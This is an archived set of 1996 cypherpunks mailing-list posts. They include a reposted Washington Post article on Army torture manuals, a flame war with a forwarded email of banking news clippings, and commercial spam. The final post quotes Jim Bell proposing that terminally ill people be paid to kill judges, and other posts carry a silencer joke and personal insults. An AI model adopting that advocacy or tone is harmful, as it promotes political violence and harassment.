>The Washington Post reports at length today on the Defense Department's
>disclosure yesterday of heretofore classified trainging manuals used in the
>School of the Americas to instruct Latino troops on killing a wide range of
>civilians for political purposes. 
>To read "Army Instructed Latins On Executions, Torture," about your tax
>dollars working the AP angle: 
> 
>http://jya.com/usaexe.txt 

This article is so wonderfully appropriate to the discussion that I can't 
resist re-posting it here.

I think the part about only discovering the problem in 1992 after 10 years 
is particularly precious.  In addition, I notice that a listing of the 
appropriate targets these army people were supposed to "neutralize" are 
listed as:

   The manual on "Terrorism and the Urban Guerrilla" says that
   "another function of the CI agents is recommending CI
   targets for neutralizing. The CI targets can include
   personalities, installations, organizations, documents and
   materials ... the personality targets prove to be valuable
   sources of intelligence. Some examples of these targets are
   governmental officials, political leaders, and members of
   the infrastructure."


full article posted below:

   The Washington Post, September 21, 1996, pp. A1, A9.
   Army Instructed Latins On Executions, Torture
      Manuals Used 1982-91, Pentagon Reveals

   By Dana Priest

   U.S. Army intelligence manuals used to train Latin American
   military officers at an Army school from 1982 to 1991
   advocated executions, torture, blackmail and other forms of
   coercion against insurgents, Pentagon documents released
   yesterday show.

   Used in courses at the U.S. Army's School of the Americas,
   the manual says that to recruit and control informants,
   counterintelliigence agents could use "fear, payment of
   bounties for enemy dead, beatings, false imprisonment,
   executions and the use of truth serum," according to a
   secret Defense Department summary of the manuals compiled
   during a 1992 investigation of the instructional material
   and also released yesterday.

   A summary of the investigation and four pages of brief,
   translated excerpts from the seven Spanish-language manuals
   were released last night by the Defense Department, which
   recently has taken to making controversial information
   available in the evenings, after the deadlines of the
   prime-time network television news programs.

   The Army School of the Americas, long located in Panama but
   moved in 1984 to Fort Benning, Ga, has trained nearly
   60,000 military and police officers from Latin America and
   the United States since 1946.

   Its graduates have included some of the region's most
   notorious human rights abusers, among them Roberto
   D'Aubuisson, the leader of El Salvador's right-wing death
   squads; 19 Salvadoran soldiers linked to the 1989
   assassination of six Jesuit priests; Gen. Manuel Antonio
   Noriega, the deposed Panamanian strongman; six Peruvian
   officers linked to killings of students and a professor;
   and Col. Julio Roberto Alpirez, a Guatemalan officer
   implicated in the death of an American innkeeper living in
   Guatemala and to the death of a leftist guerrilla married
   to an American lawyer.

   The Defense Department said the school's curriculum now
   includes mandatory human rights training and it is an
   effective way to help promote military professionalism in
   a region where that concept is still nascent.

   "The problem was discovered in 1992, properly reported and
   fixed," said Lt. Col. Arne Owens, a Pentagon spokesman.
   "There have been a lot of great changes at the School of
   the Americas."

   When reports of the 1992 investigation surfaced this year
   during a congressional inquiry into the CIA's activities in
   Guatemala, spokesmen for the school denied the manuals
   advocated such extreme methods of operation, which were in
   violation of Army policy and law at the time they were in
   use.

   The 1992 investigation concluded the inclusion of the
   methods was the result of bureaucratic oversight. "It is
   incredible that the use ... since 1982 ... evaded the
   established system of doctrinal controls," said the report
   of the investigation, conducted by the office of the
   assistant to the secretary of defense for intelligence
   oversight. "Nevertheless, we could find no evidence that
   this was a deliberate and orchestrated attempt to violate
   DoD or Army policies."

   The manuals were complied by Army intelligence officials
   using "outdated instructional material without the required
   doctrinal approval" from the Army Intelligence School, the
   investigation report said.

   The material was based, in part, on training instructions
   used in the 1960s by the Army's Foreign Intelligence
   Assistance Program, entitled "Project X." The 1992
   investigation also found the manual was distributed to
   thousands of military officers from 11 South and Central
   American countries, including Guatemala, El Salvador,
   Honduras and Panama, where the U.S. military was heavily
   involved in counterinsurgency.

   One manual, entitled "Handling of Sources," also "discloses
   classified [informant] methodology that could compromise
   Army clandestine intelligence modus operandi," the 1992
   investigation found. Another manual, entitled
   "Counterintelligence," contained "sensitive Army
   counterintelligence tactics, techniques and procedures."

   The Defense Department yesterday said the 1992
   investigators found two dozen objectionable passages among
   the 1,169 pages of instruction. For instance, the manual
   entitled "Handling of Sources" says, "The CI
   [counterintelligence] agent could cause the arrest of the
   employees [informants] parents, imprison the employee or
   give him a beating" to coerce cooperation.

   On several occasions it uses the words "neutralization" or
   "neutralizing," which was commonly used at the time as a
   euphemism for execution or destruction, a Pentagon official
   said.

   The manual on "Terrorism and the Urban Guerrilla" says that
   "another function of the CI agents is recommending CI
   targets for neutralizing. The CI targets can include
   personalities, installations, organizations, documents and
   materials ... the personality targets prove to be valuable
   sources of intelligence. Some examples of these targets are
   governmental officials, political leaders, and members of
   the infrastructure."

   The Defense Department continues to try to collect the
   manuals but, as the 1992 investigation noted, "due to
   incomplete records, retrieval of all copies is doubtful."

   Rep. Joseph P. Kennedy II (D-Mass.), an advocate of closing
   the school, said in a statement last night that the manuals
   "show what we have suspected all along, that taxpayers'
   money has been used for physical abuse." Kennedy said, "The
   School of the Americas, a Cold War relic, should be shut
   down."

   [End]

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 22 Sep 1996 13:25:20 +0800
To: cypherpunks@toad.com
Subject: Timmy May's spam (Was: Re: CIA hacked)
In-Reply-To: <199609211305.OAA00455@server.test.net>
Message-ID: <HsumuD8w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Back <aba@dcs.ex.ac.uk> writes:
>
> Dimitri Vulis <dlv@bwalk.dm.com> writes:
> > > [email reply protesting spam]
> >
> > You are confused. The above question was e-mailed to me by one of
> > Timmy May's friends.
>
> What you were doing was confusing... how about attributing what people
> have said to you, in the standard way?  I was unsure what was going on
> until you clarified here.  Instead of including all the headers in
> there with just a space between your headers and the quoted headers
> (which makes it hard to follow, and makes one wonder if someone is
> trying a crude forgery), use standard quoting conventions:
>
> 	Joe Blogss <joe@bloggs.com> writes in private email:
> 	> [quoted message body]...
>
> or similar?

You're right - the forwarding mechanism I've been using so far just yanks in
the spam e-mail without any processing. I will henceforth
 1) Put the words 'Tim', 'May', and 'spam' in the subject line
 2) Put some obvious ASCII prefix in front of the quotes.
I apologize for any confusion.

> > If you have any comments about Timmy May's friends not knowing
> > English, trying to insult people, and posting non-crypto-relevant
> > political rants, address them to Timmy May and his friends.
>
> It would seem to me that the first insults were thrown by yourself,
> and that your strange habit of bouncing all the fallout to the list is
> perpetuating the problem.

No. Let me remind you the sequence of events, in chronological order:

1. Timmy May (who picked up a few popular PKC buzzwords, doesn't know
anything about crypto, and isn't interested in learning) started spamming
this mailing list with political rants

2. Most people who used to discuss crypto work on this mailing list
have unsubscribed.

3. I pointed out a few examples of Tim making factually bogus claims in
his rants.

4. Tim got very angry at me and started flaming me. I ignored him.

5. Tim posted a series of rants about me, attributing to me various
nonsense I never said. I pointed out once that I never said it and
then ignored him.

6. Recently it came to my attention that Tim's been contacting off-list
various people in the computer security field and "complaining" about
the politically incorrect things that I supposedly say on the Internet
- except that he made up most of the "things" he complained about.

7. At this point I pointed out quite publicly that he's a liar.

8. Since that time, several friends of Tim May (or maybe Tim himself,
using multiple accounts) have been sending me harrassing e-mail, often
by quoting my own cypherpunks articles and adding an obscenity.

9. Tim himself continues flaming me and telling lies about me (see his
recent rant with the subject "death threats").

And you see, Timmy May is an obsessive liar and a vindictive nutcase.

> If reporting to the list is accurate, I hear you have a PhD with a
> subject related to crypto, so presumably you would have ample
> knowledge to contribute technical crypto related thoughts.  I'm sure
> people would be interested in anything along those lines you cared to
> contribute, and your reputation would benefit,

I still hope to be able discuss crypto on this mailing list (yes, my Ph.D.
thesis was about crypto), but I see two problems:

1. A lot of people have already left this list, unwilling to be subjected
to Tim May's rants, lies, and personal attacks. If I post something crypto-
relevant to this mailing list, they won't see it.

2. Here's an example of the net-abuse being perpetrated by Tim May and his
merry gang of mailbombers. I posted some crypto-relevant wire clippings
to this mailing list. Either Tim (using an alternate account) or some pal
of his e-mailed it back to me with an obscenity appended.

]From adamsc@io-online.com  Thu Sep 19 00:00:57 1996
]Received: by bwalk.dm.com (1.65/waf)
]	via UUCP; Thu, 19 Sep 96 00:49:21 EDT
]	for dlv
]Received: from [206.245.244.5] by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
]        id AA10508 for dlv@bwalk.dm.com; Thu, 19 Sep 96 00:00:57 -0400
]Received: from GIGANTE ([206.245.244.168]) by irc.io-online.com
]          (post.office MTA v2.0 0813 ID# 285-17715) with SMTP id AAA215
]          for <dlv@bwalk.dm.com>; Wed, 18 Sep 1996 21:00:07 -0700
]Return-Path: <cypherpunks-errors@toad.com>
]Received: from toad.com ([140.174.2.1]) by irc.io-online.com
]          (post.office MTA v2.0 0813 ID# 285-17715) with ESMTP id AAA186
]          for <adamsc@io-online.com>; Wed, 18 Sep 1996 20:56:47 -0700
]Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id RAA26101 for cypherpunks-outgoing; Wed, 18 Sep 1996 17:31:02 -0700 (PDT)
]Received: from uu.psi.com (uu.psi.com [136.161.128.3]) by toad.com (8.7.5/8.7.3) with SMTP id RAA26096 for <cypherpunks@toad.com>; Wed, 18 Sep 1996 17:30:29 -0700 (PDT)
]Received: by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via UUCP;
]        id AA21433 for ; Wed, 18 Sep 96 20:18:46 -0400
]Received: by bwalk.dm.com (1.65/waf)
]	via UUCP; Wed, 18 Sep 96 12:11:04 EDT
]	for cypherpunks@toad.com
]To: "dlv@bwalk.dm.com" <dlv@bwalk.dm.com>
]Subject: Re: [NEWS] Crypto-relevant wire clippings
]From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
]Message-Id: <5gLguD3w165w@bwalk.dm.com>
]Date: Wed, 18 Sep 96 12:11:03 EDT
]In-Reply-To: <199609181401.AA21244@crl11.crl.com>
]Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y.
]Sender: owner-cypherpunks@toad.com
]Precedence: bulk
]
]>From varange@crl.com  Wed Sep 18 10:09:46 1996
]Received: by bwalk.dm.com (1.65/waf)
]	via UUCP; Wed, 18 Sep 96 11:07:02 EDT
]	for dlv
]Received: from mail.crl.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
]        id AA17510 for dlv@bwalk.dm.com; Wed, 18 Sep 96 10:09:46 -0400
]Received: from crl11.crl.com by mail.crl.com with SMTP id AA03347
]  (5.65c/IDA-1.5 for <dlv@bwalk.dm.com>); Wed, 18 Sep 1996 07:10:14 -0700
]Received: by crl11.crl.com id AA21244
]  (5.65c/IDA-1.5 for dlv@bwalk.dm.com); Wed, 18 Sep 1996 07:01:51 -0700
]From: Troy Varange <varange@crl.com>
]Message-Id: <199609181401.AA21244@crl11.crl.com>
]Subject: Re: [NEWS] Crypto-relevant wire clippings
]Date: Wed, 18 Sep 1996 07:01:50 -0700 (PDT)
]In-Reply-To: <3kJFuD96w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 17, 96 10:32:37 pm
]X-Mailer: ELM [version 2.4 PL23]
]Mime-Version: 1.0
]Content-Type: text/plain; charset=US-ASCII
]Content-Transfer-Encoding: 7bit
]Content-Length: 19290
]
]>
]> Money Laundering Alert: August 1996
]>
]> 'Unauthorized' Banks Pose Laundering Threat
]>
]> They are subject to none of the recordkeeping or reporting requirements
]> of the Bank Secrecy Act, receive no examinations from any banking
]> regulator, and may be on your bank's currency transaction reporting
]> exemption list.
]>
]> The Office of the Comptroller of the Currency refers to them as
]> "entities that may be conducting banking operations in the U.S. without
]> a license." Money launderers probably refer to them as dreams come true
]> and, unless legitimate financial institutions are alert, can use them to
]> place illicit proceeds into the financial system.
]>
]> They are "unauthorized" banks, and for the past five years the OCC has
]> been disseminating advisories to legitimate U.S. banks - but not to
]> consumers - in an effort to expose their existence and halt their
]> illegal operations.
]>
]> These so-called "banks" offer a variety of banking services, often at
]> lower fees and better interest rates than legitimate banks offer. What
]> makes them different from a legitimate bank - and attractive to money
]> launderers -- is that they are not licensed by any U.S. banking agency
]> and thus do not have to meet regulatory standards.
]>
]> Because the OCC and other federal bank regulators are not investigative
]> agencies, they can do little more than report these institutions to
]> those who are. If the entities are found to be operating a bank without
]> a license they can be prosecuted under the Glass-Steagell Act (Title 12,
]> USC Sec. 378(a)(2)).
]>
]> Such prosecutions are rare. In one case in 1994, initiated by Federal
]> Reserve Board examiners, the principals of Lombard Bank, Ltd., were
]> charged with operating an unauthorized bank through a payable-through
]> account at American Express Bank International in Miami. Lombard, which
]> had been "licensed" in the South Pacific money laundering haven of
]> Vanuatu, offered its Central American customers virtually full banking
]> services in the U.S. through its PTA (MLA, Sep. 1994).
]>
]> Earlier this year, the OCC released a list of more than 50 "banks" known
]> to be operating without authorization. OCC officials say the number
]> grows steadily. Some of the "banks" say they are licensed by foreign
]> countries or U.S. states to conduct banking business. Others, such as
]> the Swiss Trade & Commerce Trust, Ltd., of Belize, continue to offer
]> services in the U.S. despite edicts from foreign banking authorities to
]> cease doing business.
]>
]> The unauthorized entities have a common trait. They usually have names
]> that are similar to those of well-known legitimate institutions. The OCC
]> list includes the Bank of England, a Washington, D.C., entity not
]> associated with London's famous "old lady on Threadneedle Street" and
]> Citicorp Financial Services, a Beverly Hills firm not associated with
]> the better-known institution of that name. It also includes the First
]> Bank of Internet, which heralds itself as the first bank in cyberspace.
]>
]> Through its periodic "special alerts," the OCC warns banks to "view with
]> extreme caution any proposed transaction involving any of the listed
]> entities." It makes no effort to educate members of the general public
]> who unknowingly place their money and trust in those uninsured
]> institutions.
]>
]>
]>
]>
]> American Banker: Friday, August 30, 1996
]>
]> Swift Near Alliance in Trade Document Automation
]>
]> By STEVEN MARJANOVIC
]>
]> Swift, the international banking telecommunications network, wants to
]> play a bigger role in trade finance and the exchange of related
]> documentation.
]>
]> Sources said the Brussels-based organization will soon take a position--
]> perhaps as early as its September board meeting-- on whether to work on
]> trade automation in cooperation with another consortium, called Bolero.
]>
]> Such a move would involve an increase in nonbank participants on a
]> bank-owned network that has approached such liberalization cautiously.
]>
]> Swift, formally the Society for Worldwide Interbank Financial
]> Telecommunication, is used by 5,300 banks for exchanging messages in
]> such areas as funds transfer, foreign exchange, and securities.
]>
]> The network averaged about 2.7 million messages a day in July,
]> representing daily dollar volumes exceeding $2 trillion.
]>
]> Officials said Swift is nearing a decision to work with the Bolero
]> Association, which is forming an electronic registry for the so-called
]> "dematerializing" of trade documents. Swift could provide the "platform"
]> for allowing banks and corporations to exchange such documentation as
]> letters of credit and bills of lading.
]>
]> Bolero was formed in 1994 with funding from the European Commission, but
]> has not formulated concrete operating plans. Its members include
]> Citicorp, Barclays Bank PLC, and other multinational banks and
]> corporations.
]>
]> Peter Scott, trade services market director at Swift, said it has been
]> in discussions with London-based Bolero since December 1995 about
]> joining forces to automate the exchange of trade documents.
]>
]> "Bankers are beginning to sense both the opportunities in those areas
]> and the threats to them from an intermediary stepping in and potentially
]> taking away the business," Mr. Scott said.
]>
]> Trade-document capability "is not a heavily utilized area within Swift
]> at the present time," he said.
]>
]> The potential in automation is obvious to Bolero officials. At the New
]> York Banktrade Conference recently, John McKessy, the association's
]> North American representative, said the annual value of goods moved
]> internationally approaches $4 trillion.
]>
]> He estimated current international trade requires some three billion
]> documents to be issued and managed.
]>
]> The cost of dealing with paper alone eats up about 7% of the total value
]> of those goods, as much as $280 billion, Mr. McKessy said.
]>
]> Bank revenues from issuing letters of credit last year were just over $1
]> billion, according to a soon-to-be-released survey by the U.S. Council
]> on International Banking.
]>
]> Anthony K. Brown, senior vice president of trade services at MTB Bank,
]> described trade transaction processing as "extremely cumbersome and
]> tedious, prone to mistakes and delays (that) can be a hindrance to the
]> completion of a transaction."
]>
]> MTB is a $400 million-asset merchant bank based in New York. About 80%
]> of its $100 million in loans are trade-related.
]>
]> The paper-shuffling costs are not borne entirely by banks. Import/export
]> companies, insurers, freight forwarders, and various government
]> inspection agencies are also involved.
]>
]> "The question is whether Swift wants to do it," said Dan Taylor,
]> president of the New York-based U.S. Council.
]>
]> "Swift is going to act fairly quickly on this," he added.
]>
]> Mr. Taylor said Swift officials will likely grapple once again with the
]> political and philosophical issues of giving nonbanks more access to
]> Swift, and to payment systems generally.
]>
]> In 1995, the network granted partial access to nonbanks after years of
]> heated debate.
]>
]> "You always have this push and pull, where some banks would like Swift
]> to do certain things" while others want the network to focus on the
]> money transfer business, Mr. Taylor said.
]>
]> "If Bolero succeeds and Swift joins, I think it will move fairly
]> rapidly, but I'm not sure that Bolero is going to be the only thing out
]> there."
]>
]> He said Bolero might evolve using value-added networks - or intranets -
]> like the IBM Global Network and General Electric Information Services
]> Co., or perhaps even the Internet.
]>
]> Indeed, another member of Bolero, CSI Complex Systems Inc., New York, is
]> apparently talking to several providers of private, value-added networks
]> and may soon enter a contract with one.
]>
]> CSI letter-of-credit software leads the pack in banking, with about a
]> 16% market share, Mr. Taylor said.
]>
]> The company recently formed a business unit called Electronic Documents
]> International, which has developed an Internet-based system for
]> initiating letters of credit. CSI spokesman George Capsis said the
]> software, Import.com, creates "about 30 key documents involved in
]> international trade."
]>
]> The Internet, enhanced with security features, may help the trade
]> industry reduce paper-related costs, especially at smaller companies
]> overseas.
]>
]> CSI managing director Andre Cardinale said customers need only to "dial
]> into a bank's Internet server, pull up the Import.com application, and
]> actually fill in the details to create a new letter of credit or an
]> amendment to an existing one."
]>
]> While Bolero may find a place on the Internet or a GE-type network, Mr.
]> Cardinale said the ultimate push may yet come from the banking industry
]> working collectively through Swift.
]>
]> He said Swift opposition from nonbank constituencies that are concerned
]> the telecommunications cooperative will be more sympathetic to banks
]> when disputes arise.
]>
]> But "if Swift does it," he added, "it will bring banks into the universe
]> far more - pardon the pun - swiftly."
]>
]>
]> Crain's New York Business: August 26, 1996
]>
]> Bloomberg to Detail Growth of Information Empire
]>
]> Michael Bloomberg made a name for himself on Wall Street with his
]> trading acumen and mastery of the computer systems that were becoming
]> crucial to success in the securities business.
]>
]> But no one suspected when he left Salomon Brothers in 1981 that in the
]> next decade he would build the fastest-growing provider of financial
]> information in the world.
]>
]> Mr. Bloomberg, whose company Bloomberg Financial Markets has estimated
]> sales of $600 million, will be the keynote speaker at the fifth annual
]> Crain's ''Growing a Business Expo,'' to be held this year on Thursday,
]> Oct. 24.
]>
]> The event will take place at the New York Hilton & Towers from 8 a.m. to
]> 1 p.m. It is presented by Citibank and co-sponsored by Con Edison and
]> Empire Blue Cross and Blue Shield.
]>
]> Last year, more than 1,000 growing business owners and managers attended
]> the expo, which provides information for companies operating in the city
]> regarding potential suppliers, financial resources and government
]> programs.
]>
]> The cost to attend the event is $45 and includes a continental
]> breakfast. Individuals registering before Sept. 6 can bring a colleague
]> for free. To register, call Flagg Management at (212) 286-0333.
]>
]> In addition to Mr. Bloomberg's speech, attendees will be able to attend
]> seminars on financing and other help available from the city, financing
]> techniques, energy cost savings programs and how to reduce health
]> insurance costs. An expected 135 exhibitors will be offering products
]> and services of use to growing companies.
]>
]> Crain's New York Business editors will discuss how a growing business
]> can get coverage in Crain's and in other publications.
]>
]> The heart of Mr. Bloomberg's empire is a news gathering operation that
]> sends information through 62,000 computer terminals installed on the
]> desks of investment professionals around the nation. His company
]> provides the latest financial news and sophisticated tools to analyze
]> information.
]>
]> The company he has built is noted for its lack of bureaucracy despite
]> its growth to 2,000 employees. Its hallmarks are hands-on leadership and
]> an entrepreneurial atmosphere where employees receive perks such as free
]> food.
]>
]> Mr. Bloomberg has extended his reach to include an all-news radio
]> station in New York, WBBR; Bloomberg Personal TV; syndicated television
]> shows; a monthly personal finance magazine; and a similar magazine for
]> institutional investors.
]>
]>
]> American Banker: Friday, September 6, 1996
]>
]> America Online Opens a New Banking Channel
]>
]> By DREW CLARK
]>
]> Nineteen banks - national home banking stalwarts such as Citicorp and
]> BankAmerica, plus a complement of less prominent regionals - have
]> climbed onto the America Online bandwagon.
]>
]> Most already offer their customers several options for banking via
]> personal computer and view America Online, with its six million
]> subscribers, as a way to appeal to a broad cross-section of computer-
]> literate consumers.
]>
]> Fourteen of the AOL banking partners will be delivering services through
]> BankNow, a software package developed for the interactive network by
]> Intuit Inc.
]>
]> The other five banks have opted to use their own software. One of them -
]> Security First Network Bank, which operates entirely on the Internet -
]> will invite AOL users in through their Web browsers.
]>
]> With its announcement this week, America Online Inc. takes its place
]> among the many alternative "channels" for on-line banking.
]>
]> Many of the banks on AOL's list are simultaneously cooperating with
]> other companies that are themselves competitors, such as Intuit and
]> Microsoft Corp., suppliers of the Quicken and Money financial management
]> software, respectively.
]>
]> Also crossing competitive lines, America Online said its subscribers
]> will be able to bank from home with PC software from three suppliers
]> other than Intuit: Checkfree Corp., Online Resources and Communications
]> Corp., and Visa Interactive.
]>
]> "Everyone understands that there is competition in the home banking
]> arena," said David Baird, general manager of the personal finance
]> division at America Online, based in Dulles, Va. "To align ourselves
]> with exclusively one company would be a mistake."
]>
]> Intuit can count on 14 initial bank users of BankNow. Spokesmen for the
]> other three system vendors declined to say when they expect to have home
]> banking products available for the AOL channel.
]>
]> Experts noted that AOL and Intuit could be a strong tandem, in that they
]> dominate their respective businesses.
]>
]> Intuit's Quicken is the leading brand in personal finance software. The
]> company claims more than 9 million active users and a market share of
]> about 80%.
]>
]> America Online's subscriber base of six million is as big as those of
]> its next two competitors, Compuserve and Prodigy, combined.
]>
]> The financial institutions currently offering BankNow are: American
]> Express, Bank of Stockton (Calif.), Centura Banks Inc., Commerce Bank of
]> Kansas City, Mo., Commercial Federal of Omaha, Compass Bank of Alabama,
]> CoreStates Financial Corp., Crestar Financial Corp., First Chicago NBD
]> Corp., Laredo (Tex.) National Bank, M&T Bank of Western New York,
]> Marquette Bank of Minneapolis, Sanwa Bank California, and Union Bank of
]> California.
]>
]> More plan to offer BankNow-based services through AOL later this year:
]> BankAtlantic of Florida, Bank of Boston, First Hawaiian Bank, First
]> Michigan Bank, Mellon Bank, Signet Bank, and U.S. Bank of Oregon.
]>
]> Unlike Quicken, BankNow software is available free to America Online
]> subscribers.
]>
]> Banks' fees will vary. First National Bank of Chicago said it will
]> charge $3.95 a month for on-line banking and $9.95 a month for other
]> services that include bill payment.
]>
]> Centura Banks Inc. said it will offer on-line banking free, and charge
]> $5.95 a month for bill payment.
]>
]> Intuit officials declined to disclose what its Intuit Services Corp.
]> processing unit will charge to handle these transactions for banks.
]>
]> Some of Intuit's larger bank partners chose not to offer BankNow because
]> they already promote their own PC banking programs.
]>
]> For example, Citicorp, First Union, and Wells Fargo each support
]> Quicken, but passed on BankNow. Instead, they are paying a premium for a
]> "button" on America Online's banking screen that will eventually link
]> users to a proprietary home banking program.
]>
]>
]>
]> AP Online: Thursday, September 5, 1996
]>
]> House Probes Money Laundering
]>
]> By ROB WELLS
]>
]> House Banking Committee members on Thursday urged a Treasury Department
]> agency to step up its efforts to halt money laundering by Mexican drug
]> lords.
]>
]> Rep. Spencer Bachus, R-Ala., urged the Financial Crimes Enforcement
]> Network to put in place new regulations to plug a significant loophole
]> that allows Mexico's drug dealers to place their ill-gotten profits back
]> into the U.S.
]>
]> Bachus, chairman of the House Banking oversight subcommittee, said
]> Congress gave authority to FinCen in 1994 to put in place new rules that
]> would prevent drug dealers from using foreign bank drafts, a type of
]> check, to evade currency reporting restrictions.
]>
]> ''That effort is long, long overdue,'' Bachus said.
]>
]> Rep. Henry Gonzalez, D-Texas, asked the agency to provide further
]> details about suspected money laundering in his home town of San
]> Antonio, particularly the source of a $3 billion cash surplus in the San
]> Antonio Federal Reserve Bank.
]>
]> The issue arose as Bachus' panel began exploring the dramatic rise of
]> narcotics traffic along the 2,000 mile long U.S.-Mexico border, and the
]> ease with which drug dealers can ship their profits to the south. Money
]> laundering refers to the practice by which drug dealers, mobsters and
]> others funnel their illegal profits into the banking system through
]> businesses or other means.
]>
]> Bachus said estimates of drug profits laundered through Mexico range
]> from $6 billion to $30 billion per year. Stanely E. Morris, FinCen's
]> director, defended his agency's record, saying a combination of new
]> rules and tougher enforcement in the past decade has ''made it more
]> difficult to launder money in the U.S.'' and increased the costs of
]> money laundering. Morris' agency enforces the Bank Secrecy Act, a key
]> weapon against money laundering.
]>
]> As for the new rules aimed at foreign bank drafts, Morris said the
]> regulations are more difficult than first expected because such
]> restrictions also could hinder legitimate commerce. He said the proposal
]> would be released soon.
]>
]> FinCen is working on other fronts to combat money laundering, which
]> includes a new computer system that tallies bank fraud to help
]> regulators gain an early warning of money laundering.
]>
]> In addition, the Clinton Administration assisted Mexico in adopting new
]> anti-money laundering rules earlier this year. And Treasury Secretary
]> Robert Rubin convened a conference of 29 nations in December 1995 to
]> focus on the money laundering problem.
]>
]> One committee member, Rep. Maxine Waters, D-Calif., addressed the
]> political context of the hearings.
]>
]> Waters said she was suspicious that the Republican-led Congress was
]> holding ''a rash of hearings this month ... on the subject of drugs just
]> as Presidential candidate Dole tries to use the issue as part of his
]> campaign strategy against President Clinton.''
]>
]> Waters said if the GOP-led House ''is truly serious about the impact of
]> drugs'' it should hold hearings about charges raised in a San Jose
]> Mercury News investigative series last month concerning the role
]> CIA-backed rebels in Nicaragua played in bringing crack cocaine and
]> weapons to Los Angeles and other cities.
]>
]> Bachus told Waters the hearing wasn't motivated by politics and that he
]> had personally been involved in anti-drug efforts prior to his election
]> to Congress.
]>
]> ---
]>
]> Dr.Dimitri Vulis KOTM
]Fuckhead.

Is this any more readable? See, I put a ']' in front of the quoted material.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@acadian.net>
Date: Sun, 22 Sep 1996 13:14:24 +0800
To: cypherpunks@toad.com
Subject: Re: Death Threats
In-Reply-To: <ae69ba1d01021004cb52@[207.167.93.63]>
Message-ID: <Pine.SOL.3.93.960921213704.5049M-100000@stiletto.acadian.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 21 Sep 1996, Timothy C. May wrote:
...
> crime"? Don't I believe in free speech? Well, if I hear that Vladimir G.
> Nulis says I should be killed, and that he is coming to California to take
> care of this, I have no compunctions, liberrarian or otherwise, about
> shooting first at the first sign of his appearance on my property.
> Understandably, the government does not wish this to happen. Thus, I have
> no problem with illegalizing direct and concrete threats. General threats,
> such as "all lawyers should be taken out into the parking lot and garotted"
> are not specific, direct, and concrete, and hence fall under the free
> speech provisions.)

I have heard of one person who was shot to death trying to visit a woman
who had a restraining order against him.

I don't think they even bothered trying to prosecute her; on the other
hand, this isn't California...

BTW, if you are a libberarian now, I suggest you use some sort of
silencer.

> --Tim May
> 
> We got computers, we're tapping phone lines, I know that that ain't allowed.

Where's that from?

Phil Fraering              "And the moral of the story is,
pgf@acadian.net            *never count your boobies until they
318/261-9649               are hatched*."
                            - James Thurber, "The Unicorn in the Garden"







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 23 Sep 1996 03:50:04 +0800
To: cypherpunks@toad.com
Subject: Re: Timmy May's spam (Was: Re: CIA hacked)
Message-ID: <199609221727.KAA00049@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:55 AM 9/22/96 EDT, Dr.Dimitri Vulis KOTM frothed:
> I'm not "worried", since Timmy May has already earned the reputation of a
> nutcase and a liar in these circles,

Back to the kill file.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mblvd@telebase.com
Date: Sun, 22 Sep 1996 12:12:45 +0800
Subject: Music Boulevard Birthday Sale - 10% Off!
Message-ID: <199609220154.VAA21581@telebase.com.>
MIME-Version: 1.0
Content-Type: text/plain


  Dear Music Boulevard User:
  
  Come to the Music Boulevard Birthday Blowout Sale! All CDs are 10% off 
  of our already discounted prices.   The sale is going on now, but will 
  only last for a limited time, so make sure you visit
  http://www.musicblvd.com soon!
  
  The World Wide Web's ultimate online music store, Music Boulevard allows
  music lovers around the world to quickly and easily purchase products
  and learn about their favorite artists in an exciting and entertaining
  multimedia environment. Users can browse through a massive catalog of
  more than 150,000 different music titles, read artist biographies and
  discographies, check out album reviews, view cover artwork and listen
  to the Internet's largest selection of audio samples.
  
  Thank you,
  
  Music Boulevard Staff
  
  p.s. If you don't want to receive messages like this in the future, please
       send us a note at service@musicblvd.com with the word 'remove' in the
       subject line.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Sun, 22 Sep 1996 15:15:31 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Kill 'em and let God sort it out, was Re: The GAK Momentum is Building...
Message-ID: <v02130501ae6a0cc65d4b@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


> jim bell wrote:
>Naturally, you won't even consider the possibility of going outside the
>system to solve a problem.  The rest of us notice that there are probably
>thousands of terminally-ill people who would gladly act as a human kamikaze
>and get rid of any judge inclined to impose such a fine, for a payment of 1%
>of this principle amount to a family member or loved one, leaving 99%
>available for the few other judges foolish enough to basically commit
>suicide by taking up a futile gesture.
>

If AP came to be seen as an acceptable way for business and citizens to
right egregious wrongs it would quickly lead to a 'law of the jungle'
situation, which I think any sane person would reject as the cure being
worse than the disease.  However, if governemnts (especially ours) continue
to expand their implied authority and greatly diminishing personal
liberties we all took for granted were inaliable human rights (in our own
best interest, of course), a time may come when a bit of rebellion may be
the only viable alternative for self-correction.  I pray it never comes to
this, but Thomas Jefferson contemplating this said:

"God forbid we should ever be 20 years without such a rebellion. . . .What
country can preserve it's liberties if their rulers are not warned from
time to time that their people preserve the spirit of resistance?. . .The
tree of liberty must be refreshed from time to time with the blood of
patriots and tyrants."

